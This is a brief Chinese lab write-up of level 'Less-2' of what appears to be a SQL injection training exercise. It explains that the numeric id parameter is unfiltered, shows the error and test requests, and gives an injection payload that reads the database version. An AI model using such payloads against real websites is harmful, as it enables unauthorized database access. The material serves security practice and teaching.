Less-2

admin 2021年9月1日15:05:34评论33 views字数 335阅读1分7秒阅读模式

Less-2

源码:
同样未做过滤,但此处的变量id无引号。大概是直接将变量id当做整形传入查询。
?id=12 显示id为12的用户
?id=12a 报错:Unknown column ’12a’ in ‘where clause’
?id=%31 显示id为1的用户
注入测试:
?id=1+and+left(version(),1)=5 直接注入即可得到版本号

FROM :rickyhao.com | rickyhao.com

相关推荐: DDCTF2020 Writeup

DDCTF2020 Writeup 全靠lfy带飞orz. Web Web1 照着来一遍请求,拿到jwt,jwt.io看一下是hs256 跑一下key是1,伪造即可拿到client client抓请求发现signature对即可: 逆client,得到sign…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日15:05:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Less-2https://cn-sec.com/archives/499862.html

发表评论

匿名网友 填写信息